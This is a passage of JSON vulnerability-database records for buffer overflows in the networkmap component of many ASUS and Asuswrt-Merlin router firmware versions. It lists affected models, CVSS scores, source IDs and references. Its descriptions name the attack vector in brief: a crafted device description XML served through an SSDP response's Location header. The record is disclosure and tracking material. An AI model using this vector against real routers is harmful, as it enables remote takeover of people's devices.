"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac1200",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac52u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.4180"
},
{
"model": "rt-ac68p",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n66u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac53",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9883"
},
{
"model": "rt-n12d1",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac88u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac3200",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt n12\\+ pro",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac58u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7485"
},
{
"model": "rt-ac55u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac66u b1",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n300",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt ac1200g",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt ac1200gu",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt ac1900p",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt n12+ pro",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac1200",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac3100",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac3200",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac51u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac52u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac53",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac5300",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac55u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac56u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac58u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac66u b1",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac68p",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac88u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12+",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12d1",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12hp",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n16",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n18u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n300",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n56u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n66u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n56u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac5300",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1900p",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac52u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac51u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n18u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac3200",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1200gu",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac3100",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1200g",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac1200",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac53",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12d1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12+",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt n12+ pro",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n16",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n300",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac55u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac56u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac58u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u b1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac88u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac68p",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3479"
},
{
"model": "rt-n12d1",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n12\\+",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n12hp",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.2943"
},
{
"model": "rt-ac53",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9883"
},
{
"model": "rt n12\\+ pro",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac1200",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac3200",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n300",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35393"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-768"
},
{
"db": "NVD",
"id": "CVE-2017-11344"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200gu_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1900p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_n12%2B_pro_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac1200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac51u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac52u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac53_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac5300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac55u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac56u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac58u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_b1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac88u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12%2B_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12d1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_b1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n16_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n18u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n56u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n66u_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
}
]
},
"cve": "CVE-2017-11344",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2017-11344",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-35393",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-101757",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2017-11344",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-11344",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-11344",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-35393",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-768",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-101757",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35393"
},
{
"db": "VULHUB",
"id": "VHN-101757"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-768"
},
{
"db": "NVD",
"id": "CVE-2017-11344"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Global buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to write shellcode at any address in the heap; this can be used to execute arbitrary code on the router by hosting a crafted device description XML document at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11344"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
},
{
"db": "CNVD",
"id": "CNVD-2017-35393"
},
{
"db": "VULHUB",
"id": "VHN-101757"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2017/07/14/3",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-11344",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005983",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-768",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-35393",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97015",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-101757",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35393"
},
{
"db": "VULHUB",
"id": "VHN-101757"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-768"
},
{
"db": "NVD",
"id": "CVE-2017-11344"
}
]
},
"id": "VAR-201707-0387",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35393"
},
{
"db": "VULHUB",
"id": "VHN-101757"
}
],
"trust": 1.342782942
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35393"
}
]
},
"last_update_date": "2025-04-20T23:36:49.576000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://asuswrt.lostrealm.ca/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-101757"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
},
{
"db": "NVD",
"id": "CVE-2017-11344"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://www.openwall.com/lists/oss-security/2017/07/14/3"
},
{
"trust": 1.1,
"url": "https://asuswrt.lostrealm.ca/changelog"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11344"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-11344"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35393"
},
{
"db": "VULHUB",
"id": "VHN-101757"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-768"
},
{
"db": "NVD",
"id": "CVE-2017-11344"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-35393"
},
{
"db": "VULHUB",
"id": "VHN-101757"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-768"
},
{
"db": "NVD",
"id": "CVE-2017-11344"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-35393"
},
{
"date": "2017-07-17T00:00:00",
"db": "VULHUB",
"id": "VHN-101757"
},
{
"date": "2017-08-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005983"
},
{
"date": "2017-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-768"
},
{
"date": "2017-07-17T13:18:20.923000",
"db": "NVD",
"id": "CVE-2017-11344"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-35393"
},
{
"date": "2017-12-20T00:00:00",
"db": "VULHUB",
"id": "VHN-101757"
},
{
"date": "2017-08-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005983"
},
{
"date": "2017-09-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-768"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-11344"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-768"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware network map global buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005983"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-768"
}
],
"trust": 0.6
}
}
VAR-201707-0400
Vulnerability from variot - Updated: 2025-04-20 23:36Stack buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by hosting a crafted device description XML document (that includes a serviceType element) at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-0400",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac68u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n12\\+",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n56u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.378.7177"
},
{
"model": "rt-ac66u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac5300",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n18u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt ac1200g",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3167"
},
{
"model": "rt ac1900p",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac56u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n12hp",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.2943"
},
{
"model": "rt ac1200gu",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.5577"
},
{
"model": "rt-n12hp b1",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3479"
},
{
"model": "rt-ac51u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n16",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac3100",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac1200",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac52u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.4180"
},
{
"model": "rt-ac68p",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n66u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac53",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9883"
},
{
"model": "rt-n12d1",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac88u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
